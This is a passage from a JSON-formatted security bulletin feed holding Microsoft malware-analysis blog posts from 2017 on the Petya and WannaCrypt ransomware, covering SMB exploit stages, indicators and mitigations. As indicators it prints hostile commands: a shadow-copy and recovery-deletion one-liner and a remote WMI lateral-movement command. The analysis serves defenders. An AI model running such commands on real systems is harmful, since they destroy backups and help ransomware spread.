with the Task Scheduler service.\n\n * Lateral Movement (Remote WMI) \n * _\"process call create \\\"C:\\\\\\Windows\\\\\\System32\\\\\\rundll32.exe \\\\\\\\\\\"C:\\\\\\Windows\\\\\\perfc.dat\\\\\\\\\\\" #1\"_\n\n**Network indicators**\n\nIn environments where NetFlow data are available, this ransomware\u2019s subnet-scanning behavior may be observed by looking for the following:\n\n * Workstations scanning ports tcp/139 and tcp/445 on their own local (/24) network scope\n * Servers (in particular, domain controllers) scanning ports tcp/139 and tcp/445 across multiple /24 scopes\n\n_ _", "edition": 2, "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-06-28T06:57:43", "title": "New ransomware, old techniques: Petya adds worm capabilities", "type": "mmpc", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0144", "CVE-2017-0145"], "modified": "2017-06-28T06:57:43", "href": "https://blogs.technet.microsoft.com/mmpc/2017/06/27/new-ransomware-old-techniques-petya-adds-worm-capabilities/", "id": "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "cvss": {"score": 9.3, "vector": 
"AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-09-15T09:08:41", "description": "_(Note: Read our latest comprehensive report on ransomware: [**Ransomware 1H 2017 review: Global outbreaks reinforce the value of security hygiene**](<https://blogs.technet.microsoft.com/mmpc/2017/09/06/ransomware-1h-2017-review-global-outbreaks-reinforce-the-value-of-security-hygiene/>).)_\n\n \n\nOn May 12, there was a major outbreak of [WannaCrypt ransomware](<https://blogs.technet.microsoft.com/mmpc/2017/05/12/wannacrypt-ransomware-worm-targets-out-of-date-systems/>). WannaCrypt directly borrowed exploit code from the ETERNALBLUE exploit and the DoublePulsar backdoor module leaked in April by a group calling itself Shadow Brokers.\n\nUsing ETERNALBLUE, WannaCrypt propagated as a worm on older platforms, particularly Windows 7 and Windows Server 2008 systems that haven't patched against the SMB1 vulnerability CVE-2017-0145. The resulting ransomware outbreak reached a large number of computers, even though Microsoft released security bulletin [MS17-010](<https://technet.microsoft.com/en-us/library/security/ms17-010.aspx>) to address the vulnerability on March 14, almost two months before the outbreak.\n\nThis post\u2014complementary to our earlier post about the [ETERNALBLUE and ETERNALROMANCE exploits released by Shadow Brokers](<https://blogs.technet.microsoft.com/mmpc/2017/06/16/analysis-of-the-shadow-brokers-release-and-mitigation-with-windows-10-virtualization-based-security/>)\u2014takes us through the WannaCrypt infection routine, providing even more detail about post-exploitation phases. 
It also describes other existing mitigations as well as new and upcoming mitigation and detection techniques provided by Microsoft to address similar threats.\n\n## Infection cycle\n\nThe following diagram summarizes the WannaCrypt infection cycle: initial shellcode execution, backdoor implantation and package upload, kernel and userland shellcode execution, and payload launch.\n\n\n\n_Figure 1. WannaCrypt infection cycle overview_\n\nThe file _mssecsvc.exe_ contains the main exploit code, which launches a network-level exploit and spawns the ransomware package. The exploit code targets a kernel-space vulnerability and involves multi-stage shellcode in both kernel and userland processes. Once the exploit succeeds, communication between the DoublePulsar backdoor module and _mssecsvc.exe_ is encoded using a pre-shared XOR key, allowing transmission of the main payload package and eventual execution of ransomware code.\n\n## Exploit and initial shellcodes\n\nIn an earlier [blog post](<https://blogs.technet.microsoft.com/mmpc/2017/06/16/analysis-of-the-shadow-brokers-release-and-mitigation-with-windows-10-virtualization-based-security/>), Viktor Brange provided a detailed analysis of the vulnerability trigger and the _instruction pointer_ control mechanism used by ETERNALBLUE. After the code achieves instruction pointer control, it focuses on acquiring persistence in kernel space using kernel shellcode and the DoublePulsar implant. It then executes the ransomware payload in user space.\n\n### Heap spray\n\nThe exploit code sprays memory on a target computer to lay out space for the first-stage shellcode. It uses non-standard SMB packet segments to make the allocated memory persistent on _hardware abstraction layer_ (HAL) memory space. It sends 18 instances of heap-spraying packets, which have direct binary representations of the first-stage shellcode.\n\n\n\n_Figure 2. 
Shellcode heap-spraying packet_\n\n### Initial shellcode execution: first and second stages\n\nThe exploit uses a _function-pointer overwrite_ technique to direct control flow to the first-stage shellcode. This shellcode installs a second-stage shellcode as a _SYSENTER_ or _SYSCALL_ routine hook by overwriting _model-specific registers_ (MSRs). If the target system is x86-based, it hooks the SYSENTER routine by overwriting _IA32_SYSENTER_EIP_. On x64-based systems, it overwrites the _IA32_LSTAR_ MSR to hook the SYSCALL routine. More information about these MSRs can be found in [Intel\u00ae 64 and IA-32 Architectures Software Developer's Manual Volume 3C](<https://www.intel.com/content/dam/www/public/us/en/documents/manuals/64-ia-32-architectures-software-developer-vol-3c-part-3-manual.pdf>).\n\n\n\n_Figure 3. First-stage shellcode for x86 systems_\n\nOriginally, the IA32_SYSENTER_EIP contains the address of _nt!KiFastCallEntry_ as its SYSENTER routine.\n\n\n\n_Figure 4. Original IA32_SYSENTER_EIP value pointing to KiFastCallEntry_\n\nAfter modification by the first-stage shellcode, IA32_SYSENTER_EIP now points to the second-stage shellcode.\n\n\n\n_Figure 5. Modified IA32_SYSENTER_EIP value points to the main shellcode_\n\nThe first-stage shellcode itself runs in _DISPATCH_LEVEL_. By running the second-stage shellcode as the SYSENTER routine, the first-stage code guarantees that the second-stage shellcode runs in _PASSIVE_LEVEL_, giving it access to a broader range of kernel APIs and paged-out memory. And although the second-stage shellcode delivered with this malware actually doesn't access any paged pools or call APIs that require running in PASSIVE_LEVEL, this approach allows attackers to reuse the same module for more complicated shellcode.\n\n## Backdoor implantation\n\nThe second-stage shellcode, now running on the targeted computer, generates a master XOR key for uploading the payload and other communications. 
It uses system-specific references, like addresses of certain APIs and structures, to randomize the key.\n\n\n\n_Figure 6. Master XOR key generation_\n\nThe second-stage shellcode implants DoublePulsar by patching the SMB1 _Transaction2_ dispatch table. It overwrites one of the reserved command handlers for the _SESSION_SETUP (0xe)_ subcommand of the Transaction2 request. This subcommand is reserved and not commonly used in regular code.\n\n\n\n_Figure 7. Copying packet-handler shellcode and overwriting the dispatch table_\n\nThe following code shows the dispatch table after the subcommand backdoor is installed.\n\n\n\n_Figure 8. Substitution of 0xe command handler_\n\n## Main package upload\n\nTo start uploading its main package, WannaCrypt sends multiple ping packets to the target, testing if its server hook has been installed. Remember that the second-stage shellcode runs as a _SYSENTER_ hook\u2014there is a slight delay before it runs and installs the dispatch-table backdoor. The response to the ping packet contains the randomly generated XOR master key to be used for communication between the client and the targeted server.\n\n\n\n_Figure 9. Code that returns original XOR key_\n\nThis XOR key value is used only after some bit shuffling. The shuffling algorithm basically looks like the following Python code.\n\n\n\n_Figure 10. XOR bit-shuffling code_\n\nThe upload of the encoded payload consists of multiple packets as shown below.\n\n\n\n_Figure 11. SMB Transaction2 packet showing payload upload operation_\n\nThe hooked handler code for the unimplemented subcommand processes the packet bytes, decoding them using the pre-shared XOR key. The picture above shows that the SESSION_SETUP parameter fields are used to indicate the offset and total lengths of payload bytes. The data is 12 bytes long\u2014the first four bytes indicate the total length, the next four bytes are reserved, and the last four bytes are the current offset of the payload bytes, in little-endian. 
These fields are encoded with master XOR key.\n\nBecause the reserved field is supposed to be 0, the reserved field is actually the same as the master XOR key. Going back to the packet capture above, the reserved field value is 0x38a9dbb6, which is the master XOR key. The total length is encoded as 0x38f9b8be. When this length is XORed with the master XOR key, it is 0x506308, which is the actual length of the payload bytes being uploaded. The last field is 0x38b09bb6. When XORed with the master key, this last field becomes 0, meaning this packet is the first packet of the payload upload.\n\nWhen all the packets are received, the packet handler in the second-stage shellcode jumps to the start of the decoded bytes.\n\n\n\n_Figure 12. Decoding and executing shellcode_\n\nThe transferred and decoded bytes are of size 0x50730c. As a whole, these packet bytes include kernel shellcode, userland shellcode, and the main WannaCrypt PE packages.\n\n## Executing the kernel shellcode\n\nThe kernel shellcode looks for a kernel image base and resolves essential functions by parsing PE structures. The following figure shows the APIs resolved by the shellcode:\n\n\n\n_Figure 13. Resolved kernel functions_\n\nIt uses [_ZwAllocateVirtualMemory_](<https://msdn.microsoft.com/en-us/library/windows/hardware/ff566416\\(v=vs.85\\).aspx>) to allocate a large chunk of RWX memory (0x506d70 in this case). This memory holds the userland shellcode and the main PE packages.\n\n\n\n_Figure 14. RWX memory allocation through ZwAllocateVirtualMemory_\n\nThe kernel shellcode goes through processes on the system and injects userland shellcode to the _lsass.exe_ process using an asynchronous procedure call (APC).\n\n\n\n_Figure 15. 
APC routines for injecting shellcode to a thread in a userland process_\n\n## Userland shellcode\u2014the start of a new infection cycle\n\nAfter multiple calls to [_VirtualProtect_](<https://msdn.microsoft.com/en-us/library/windows/desktop/aa366898\\(v=vs.85\\).aspx>) and PE layout operations, the shellcode loads a bootstrap DLL using a reflective DLL loading method. The WannaCrypt user-mode component contains this bootstrap DLL for both 64- and 32-bit Windows.\n\n\n\n_Figure 16. Bootstrap DLL functions_\n\nThis bootstrap DLL reads the main WannaCrypt payload from the resource section and writes it to a file _C:\\WINDOWS\\mssecsvc.exe_. It then launches the file using the [_CreateProcess_](<https://msdn.microsoft.com/en-us/library/windows/desktop/ms682425\\(v=vs.85\\).aspx>) API. At this stage, a new infection cycle is started on the newly infected computer.\n\n \n\n\n\n_Figure 17. Dropping main payload to file system_\n\n\n\n_Figure 18. Creating the main payload process_\n\n## Mitigating and detecting WannaCrypt\n\nWannaCrypt borrowed most of its attack code from those leaked by Shadow Brokers, specifically the ETERNALBLUE kernel exploit code and the DoublePulsar kernel-level backdoor. It leverages DoublePulsar's code execution mechanisms and _asynchronous procedure calls_ (APCs) at the kernel to deliver its main infection package and ransomware payload. It also uses the system file _lsass.exe_ as its injection target.\n\n### Mitigation on newer platforms and upcoming SMB updates\n\nThe ETERNALBLUE exploit code worked only on older OSes like Windows 7 and Windows Server 2008, particularly those that have _not_ applied security updates released with security bulletin [MS17-010](<https://technet.microsoft.com/en-us/library/security/ms17-010.aspx>). The exploit was limited to these platforms because it depended on executable memory allocated in kernel HAL space. Since Windows 8 and Windows Server 2012, HAL memory has stopped being executable. 
Also, for additional protection, predictable addresses in HAL memory space have been randomized since Windows 10 Creators Update.\n\nWith the upcoming Windows 10 Fall Creators Update (also known as RS3), many dispatch tables in legacy SMB1 drivers, including the _Transaction2_ dispatch table (_SrvTransaction2DispatchTable_) memory area, will be set to read-only as a defense-in-depth measure. The backdoor mechanism described here will be much less attractive to attackers because the mechanism will require additional exploit techniques for unlocking the memory area and overwriting function pointers. Furthermore, SMB1 has already been deprecated for years. With the RS3 releases for Windows 10 and Windows Server 2016, [SMB1 will be disabled](<https://blogs.technet.microsoft.com/filecab/2017/06/01/smb1-product-clearinghouse/>).\n\n### Hyper Guard virtualization-based security\n\nWannaCrypt employs multiple techniques to achieve full code execution on target systems. The IA32_SYSENTER_EIP modification technique used by WannaCrypt to run the main shellcode is actually commonly observed when kernel rootkits try to hook system calls. [_Kernel Patch Protection_](<https://blogs.msdn.microsoft.com/windowsvistasecurity/2006/08/12/an-introduction-to-kernel-patch-protection/>) (or PatchGuard) typically detects this technique by periodically checking for modifications of MSR values. WannaCrypt hooking, however, is too brief for PatchGuard to fire. Windows 10, armed with virtualization-based security (VBS) technologies such as [_Hyper Guard_](<https://www.blackhat.com/docs/us-16/materials/us-16-Weston-Windows-10-Mitigation-Improvements.pdf>), can detect and mitigate this technique because it fires as soon as the malicious _wrmsr_ instruction to modify the MSR is executed.\n\n_To enable Hyper Guard on systems with supported processors, use Secure Boot and _[_enable Device Guard_](<https://docs.microsoft.com/en-us/windows/device-security/device-guard/device-guard-deployment-guide>)_. 
Use the _[_hardware readiness tool_](<https://www.microsoft.com/en-us/download/details.aspx?id=53337>)_ to check if your hardware system supports Device Guard. Device Guard runs on the Enterprise and Education editions of Windows 10._\n\n### Post-breach detection with Windows Defender ATP\n\nIn addition to VBS mitigation provided with Hyper Guard, [Windows Defender Advanced Threat Protection](<https://www.microsoft.com/en-us/windowsforbusiness/windows-atp>) (Windows Defender ATP) can detect injection of code to userland processes, including the method used by WannaCrypt. Our researchers have also added new detection logic so that Windows Defender ATP flags highly unusual events that involve spawning of processes from _lsass.exe_.\n\n\n\n_Figure 19. Windows Defender ATP detection of an anomalous process spawned from a system process_\n\nWhile the detection mechanism for process spawning was pushed out in response to WannaCrypt, this mechanism and detection of code injection activities also enable Windows Defender ATP customers to uncover sophisticated breaches that leverage similar attack methods.\n\n**Matt Oh** \n_Windows Defender ATP Research Team_", "edition": 2, "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-06-30T13:00:00", "title": "Exploring the crypt: Analysis of the WannaCrypt ransomware SMB exploit propagation", "type": "mmpc", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": 
"COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0145"], "modified": "2017-06-30T13:00:00", "href": "https://blogs.technet.microsoft.com/mmpc/2017/06/30/exploring-the-crypt-analysis-of-the-wannacrypt-ransomware-smb-exploit-propagation/", "id": "MMPC:89789F73D15A0B331512F90F7E692851", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-09-15T09:08:41", "description": "_(Note: Read our latest comprehensive report on ransomware: _[**_Ransomware 1H 2017 review: Global outbreaks reinforce the value of security hygiene_**](<https://blogs.technet.microsoft.com/mmpc/2017/09/06/ransomware-1h-2017-review-global-outbreaks-reinforce-the-value-of-security-hygiene/>)_.)_\n\n \n\nOn May 12, 2017 we detected a new ransomware that spreads like a worm by leveraging vulnerabilities that have been previously fixed. While security updates are automatically applied in most computers, some users and enterprises may delay deployment of patches. Unfortunately, the ransomware, known as [WannaCrypt](<https://www.microsoft.com/security/portal/threat/encyclopedia/Entry.aspx?Name=Ransom:Win32/WannaCrypt>), appears to have affected computers that have not applied the patch for these vulnerabilities. While the attack is unfolding, we remind users to install [MS17-010](<https://technet.microsoft.com/en-us/library/security/ms17-010.aspx>) if they have not already done so.\n\nMicrosoft antimalware telemetry immediately picked up signs of this campaign. Our expert systems gave us visibility and context into this new attack as it happened, allowing [Windows Defender Antivirus](<https://technet.microsoft.com/en-us/itpro/windows/keep-secure/windows-defender-in-windows-10>) to deliver real-time defense. 
Through automated analysis, machine learning, and predictive modeling, we were able to rapidly protect against this malware.\n\nIn this blog, we provide an early analysis of the end-to-end ransomware attack. Please note this threat is still under investigation. The attack is still active, and there is a possibility that the attacker will attempt to react to our detection response.\n\n## Attack vector\n\nRansomware threats do not typically spread rapidly. Threats like WannaCrypt (also known as WannaCry, WanaCrypt0r, WCrypt, or WCRY) usually leverage social engineering or email as primary attack vector, relying on users downloading and executing a malicious payload. However, in this unique case, the ransomware perpetrators used publicly available exploit code for the patched SMB \"[EternalBlue](<https://blogs.technet.microsoft.com/mmpc/2017/06/16/analysis-of-the-shadow-brokers-release-and-mitigation-with-windows-10-virtualization-based-security/>)\" vulnerability, [CVE-2017-0145](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0145>), which can be triggered by sending a specially crafted packet to a targeted SMBv1 server. 
This vulnerability was fixed in security bulletin [MS17-010](<https://technet.microsoft.com/en-us/library/security/ms17-010.aspx>), which was released on March 14, 2017.\n\nWannaCrypt\u2019s spreading mechanism is borrowed from [well-known](<https://packetstormsecurity.com/files/142464/MS17-010-SMBv1-SrvOs2FeaToNt-OOB-Remote-Code-Execution.html>) [public SMB exploits](<https://github.com/RiskSense-Ops/MS17-010>), which armed this regular ransomware with worm-like functionalities, creating an entry vector for machines still unpatched even after the fix had become available.\n\nThe exploit code used by WannaCrypt was designed to work only against unpatched Windows 7 and Windows Server 2008 (or earlier OS) systems, so [Windows 10 PCs are not affected by this attack](<https://blogs.technet.microsoft.com/mmpc/2017/06/08/windows-10-creators-update-hardens-security-with-next-gen-defense/>).\n\nWe haven\u2019t found evidence of the exact initial entry vector used by this threat, but there are two scenarios that we believe are highly possible explanations for the spread of this ransomware:\n\n * Arrival through social engineering emails designed to trick users to run the malware and activate the worm-spreading functionality with the SMB exploit\n * Infection through SMB exploit when an unpatched computer is addressable from other infected machines\n\n## Dropper\n\nThe threat arrives as a dropper Trojan that has the following two components:\n\n 1. A component that attempts to exploit the SMB CVE-2017-0145 vulnerability in other computers\n 2. 
The ransomware known as WannaCrypt\n\nThe dropper tries to connect to the following domains using the API _InternetOpenUrlA()_:\n\n * www[.]iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea[.]com\n * www[.]ifferfsodp9ifjaposdfjhgosurijfaewrwergwea[.]com\n * www[x].iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea[.]test\n\nIf connection to the domains is successful, the dropper does not infect the system further with ransomware or try to exploit other systems to spread; it simply stops execution. However, if the connection fails, the threat proceeds to drop the ransomware and creates a service on the system.\n\nIn other words, unlike in most malware infections, **IT Administrators should NOT block these domains**. Note that the malware is not proxy-aware, so a local DNS record may be required. This does not need to point to the Internet, but can resolve to any accessible server which will accept connections on TCP 80.\n\n[](<https://msdnshared.blob.core.windows.net/media/2017/05/WannaCrypt11.png>)[](<https://msdnshared.blob.core.windows.net/media/2017/05/WannaCrypt1.png>)\n\nThe threat creates a service named _mssecsvc2.0_, whose function is to exploit the SMB vulnerability in other computers accessible from the infected system:\n\n_Service Name: mssecsvc2.0_ \n_Service Description: (Microsoft Security Center (2.0) Service)_ \n_Service Parameters: \u201c-m security\u201d_\n\n[](<https://msdnshared.blob.core.windows.net/media/2017/05/WannaCrypt2.png>)\n\n## WannaCrypt ransomware\n\nThe ransomware component is a dropper that contains a password-protected .zip archive in its resource section. The document encryption routine and the files in the .zip archive contain support tools, a decryption tool, and the ransom message. 
In the samples we analyzed, the password for the .zip archive is \"WNcry@2ol7\".\n\nWhen run, WannaCrypt creates the following registry keys:\n\n * _HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\\\\\<random string> = \"<malware working directory>\\tasksche.exe\"_\n * _HKLM\\SOFTWARE\\WanaCrypt0r\\\\\\wd = \"<malware working directory>\"_\n\nIt changes the wallpaper to a ransom message by modifying the following registry key:\n\n * _HKCU\\Control Panel\\Desktop\\Wallpaper: \"<malware working directory>\\@WanaDecryptor@.bmp\"_\n\nIt creates the following files in the malware's working directory:\n\n * _00000000.eky_\n * _00000000.pky_\n * _00000000.res_\n * _274901494632976.bat_\n * _@Please_Read_Me@.txt_\n * _@WanaDecryptor@.bmp_\n * _@WanaDecryptor@.exe_\n * _b.wnry_\n * _c.wnry_\n * _f.wnry_\n * _m.vbs_\n * _msg\\m_bulgarian.wnry_\n * _msg\\m_chinese (simplified).wnry_\n * _msg\\m_chinese (traditional).wnry_\n * _msg\\m_croatian.wnry_\n * _msg\\m_czech.wnry_\n * _msg\\m_danish.wnry_\n * _msg\\m_dutch.wnry_\n * _msg\\m_english.wnry_\n * _msg\\m_filipino.wnry_\n * _msg\\m_finnish.wnry_\n * _msg\\m_french.wnry_\n * _msg\\m_german.wnry_\n * _msg\\m_greek.wnry_\n * _msg\\m_indonesian.wnry_\n * _msg\\m_italian.wnry_\n * _msg\\m_japanese.wnry_\n * _msg\\m_korean.wnry_\n * _msg\\m_latvian.wnry_\n * _msg\\m_norwegian.wnry_\n * _msg\\m_polish.wnry_\n * _msg\\m_portuguese.wnry_\n * _msg\\m_romanian.wnry_\n * _msg\\m_russian.wnry_\n * _msg\\m_slovak.wnry_\n * _msg\\m_spanish.wnry_\n * _msg\\m_swedish.wnry_\n * _msg\\m_turkish.wnry_\n * _msg\\m_vietnamese.wnry_\n * _r.wnry_\n * _s.wnry_\n * _t.wnry_\n * _TaskData\\Tor\\libeay32.dll_\n * _TaskData\\Tor\\libevent-2-0-5.dll_\n * _TaskData\\Tor\\libevent_core-2-0-5.dll_\n * _TaskData\\Tor\\libevent_extra-2-0-5.dll_\n * _TaskData\\Tor\\libgcc_s_sjlj-1.dll_\n * _TaskData\\Tor\\libssp-0.dll_\n * _TaskData\\Tor\\ssleay32.dll_\n * _TaskData\\Tor\\taskhsvc.exe_\n * _TaskData\\Tor\\tor.exe_\n * _TaskData\\Tor\\zlib1.dll_\n * 
_taskdl.exe_\n * _taskse.exe_\n * _u.wnry_\n\nWannaCrypt may also create the following files:\n\n * _%SystemRoot%\\tasksche.exe_\n * _%SystemDrive%\\intel\\<random directory name>\\tasksche.exe_\n * _%ProgramData%\\<random directory name>\\tasksche.exe_\n\nIt may create a randomly named service that has the following associated ImagePath: _\"cmd.exe /c \"<malware working directory>\\tasksche.exe\"\"_.\n\nIt then searches the whole computer for any file with any of the following file name extensions: _.123, .jpeg , .rb , .602 , .jpg , .rtf , .doc , .js , .sch , .3dm , .jsp , .sh , .3ds , .key , .sldm , .3g2 , .lay , .sldm , .3gp , .lay6 , .sldx , .7z , .ldf , .slk , .accdb , .m3u , .sln , .aes , .m4u , .snt , .ai , .max , .sql , .ARC , .mdb , .sqlite3 , .asc , .mdf , .sqlitedb , .asf , .mid , .stc , .asm , .mkv , .std , .asp , .mml , .sti , .avi , .mov , .stw , .backup , .mp3 , .suo , .bak , .mp4 , .svg , .bat , .mpeg , .swf , .bmp , .mpg , .sxc , .brd , .msg , .sxd , .bz2 , .myd , .sxi , .c , .myi , .sxm , .cgm , .nef , .sxw , .class , .odb , .tar , .cmd , .odg , .tbk , .cpp , .odp , .tgz , .crt , .ods , .tif , .cs , .odt , .tiff , .csr , .onetoc2 , .txt , .csv , .ost , .uop , .db , .otg , .uot , .dbf , .otp , .vb , .dch , .ots , .vbs , .der , .ott , .vcd , .dif , .p12 , .vdi , .dip , .PAQ , .vmdk , .djvu , .pas , .vmx , .docb , .pdf , .vob , .docm , .pem , .vsd , .docx , .pfx , .vsdx , .dot , .php , .wav , .dotm , .pl , .wb2 , .dotx , .png , .wk1 , .dwg , .pot , .wks , .edb , .potm , .wma , .eml , .potx , .wmv , .fla , .ppam , .xlc , .flv , .pps , .xlm , .frm , .ppsm , .xls , .gif , .ppsx , .xlsb , .gpg , .ppt , .xlsm , .gz , .pptm , .xlsx , .h , .pptx , .xlt , .hwp , .ps1 , .xltm , .ibd , .psd , .xltx , .iso , .pst , .xlw , .jar , .rar , .zip , .java , .raw._\n\nWannaCrypt encrypts all files it finds and renames them by appending _.WNCRY_ to the file name. 
For example, if a file is named _picture.jpg_, the ransomware encrypts and renames the file to _picture.jpg.WNCRY_.\n\nThis ransomware also creates the file _@Please_Read_Me@.txt_ in every folder where files are encrypted. The file contains the same ransom message shown in the replaced wallpaper image (see screenshot below).\n\nAfter completing the encryption process, the malware deletes the volume shadow copies by running the following command:\n\n_cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet_\n\nIt then replaces the desktop background image with the following message:\n\n[](<https://msdnshared.blob.core.windows.net/media/2017/05/WannaCrypt-ransom-note.png>)\n\nIt also runs an executable showing a ransom note which indicates a $300 ransom in Bitcoins as well as a timer:\n\n[](<https://msdnshared.blob.core.windows.net/media/2017/05/WannaCrypt-ransom-executable.png>)\n\nThe text is localized into the following languages: Bulgarian, Chinese (simplified), Chinese (traditional), Croatian, Czech, Danish, Dutch, English, Filipino, Finnish, French, German, Greek, Indonesian, Italian, Japanese, Korean, Latvian, Norwegian, Polish, Portuguese, Romanian, Russian, Slovak, Spanish, Swedish, Turkish, and Vietnamese.\n\nThe ransomware also demonstrates the decryption capability by allowing the user to decrypt a few random files, free of charge. It then quickly reminds the user to pay the ransom to decrypt all the remaining files.\n\n[](<https://msdnshared.blob.core.windows.net/media/2017/05/WannaCrypt-decryptor.png>)\n\n## Spreading capability\n\nThe worm functionality attempts to infect unpatched Windows machines in the local network. At the same time, it also executes massive scanning on Internet IP addresses to find and infect other vulnerable computers. 
This activity results in large SMB traffic from the infected host, which can be observed by SecOps personnel, as shown below.\n\n[](<https://msdnshared.blob.core.windows.net/media/2017/05/WannaCrypt-exploit.png>)\n\nThe Internet scanning routine randomly generates octets to form the IPv4 address. The malware then targets that IP to attempt to exploit CVE-2017-0145. The threat avoids infecting the IPv4 address if the randomly generated value for the first octet is 127 or if the value is equal to or greater than 224, in order to skip local loopback interfaces. Once a vulnerable machine is found and infected, it becomes the next hop to infect other machines. The vicious infection cycle continues as the scanning routine discovers unpatched computers.\n\nWhen it successfully infects a vulnerable computer, the malware runs kernel-level shellcode that seems to have been copied from the public backdoor known as DOUBLEPULSAR, but with certain adjustments to drop and execute the ransomware dropper payload, both for x86 and x64 systems.\n\n[](<https://msdnshared.blob.core.windows.net/media/2017/05/WannaCrypt7.png>)\n\n[](<https://msdnshared.blob.core.windows.net/media/2017/05/WannaCrypt8.png>)\n\n## Protection against the WannaCrypt attack\n\nTo get the latest protection from Microsoft, upgrade to [Windows 10](<https://www.microsoft.com/en-us/windows/windows-10-upgrade>). Keeping your computers [up-to-date](<https://www.microsoft.com/en-us/security/portal/mmpc/help/updatefaqs.aspx>) gives you the benefits of the latest features and proactive mitigations built into the latest versions of Windows.\n\nWe recommend customers that have not yet installed the security update [MS17-010](<https://technet.microsoft.com/en-us/library/security/ms17-010.aspx>) do so as soon as possible. 
Until you can apply the patch, we also recommend two possible workarounds to reduce the attack surface:\n\n * Disable SMBv1 with the steps documented at [Microsoft Knowledge Base Article 2696547](<https://support.microsoft.com/kb/2696547>) and as [recommended previously](<https://blogs.technet.microsoft.com/filecab/2016/09/16/stop-using-smb1/>)\n * Consider adding a rule on your router or firewall to block incoming SMB traffic on port 445\n\n[Windows Defender Antivirus](<https://technet.microsoft.com/en-us/itpro/windows/keep-secure/windows-defender-in-windows-10>) detects this threat as [Ransom:Win32/WannaCrypt](<https://www.microsoft.com/security/portal/threat/encyclopedia/Entry.aspx?Name=Ransom:Win32/WannaCrypt>) as of the _1.243.297.0_ update. Windows Defender Antivirus uses cloud-based protection, helping to protect you from the latest threats.\n\nFor enterprises, use [Device Guard](<https://technet.microsoft.com/itpro/windows/keep-secure/device-guard-deployment-guide>) to lock down devices and provide kernel-level virtualization-based security, allowing only trusted applications to run, effectively preventing malware from running.\n\nUse [Office 365 Advanced Threat Protection](<https://blogs.office.com/2015/04/08/introducing-exchange-online-advanced-threat-protection/>), which has machine learning capability that blocks dangerous email threats, such as the emails carrying ransomware.\n\nMonitor networks with [Windows Defender Advanced Threat Protection](<http://www.microsoft.com/en-us/WindowsForBusiness/windows-atp>), which alerts security operations teams about suspicious activities. 
Download this playbook to see how you can leverage Windows Defender ATP to detect, investigate, and mitigate ransomware in networks: [Windows Defender Advanced Threat Protection \u2013 Ransomware response playbook](<https://www.microsoft.com/en-us/download/details.aspx?id=55090>).\n\n## Resources\n\nDownload English language security updates: [Windows Server 2003 SP2 x64](<http://download.windowsupdate.com/d/csa/csa/secu/2017/02/windowsserver2003-kb4012598-x64-custom-enu_f24d8723f246145524b9030e4752c96430981211.exe>), [Windows Server 2003 SP2 x86,](<http://download.windowsupdate.com/c/csa/csa/secu/2017/02/windowsserver2003-kb4012598-x86-custom-enu_f617caf6e7ee6f43abe4b386cb1d26b3318693cf.exe>) [Windows XP SP2 x64](<http://download.windowsupdate.com/d/csa/csa/secu/2017/02/windowsserver2003-kb4012598-x64-custom-enu_f24d8723f246145524b9030e4752c96430981211.exe>), [Windows XP SP3 x86](<http://download.windowsupdate.com/d/csa/csa/secu/2017/02/windowsxp-kb4012598-x86-custom-enu_eceb7d5023bbb23c0dc633e46b9c2f14fa6ee9dd.exe>), [Windows XP Embedded SP3 x86](<http://download.windowsupdate.com/c/csa/csa/secu/2017/02/windowsxp-kb4012598-x86-embedded-custom-enu_8f2c266f83a7e1b100ddb9acd4a6a3ab5ecd4059.exe>), [Windows 8 x86,](<http://download.windowsupdate.com/c/msdownload/update/software/secu/2017/05/windows8-rt-kb4012598-x86_a0f1c953a24dd042acc540c59b339f55fb18f594.msu>) [Windows 8 x64](<http://download.windowsupdate.com/c/msdownload/update/software/secu/2017/05/windows8-rt-kb4012598-x64_f05841d2e94197c2dca4457f1b895e8f632b7f8e.msu>)\n\nDownload localized language security updates: [Windows Server 2003 SP2 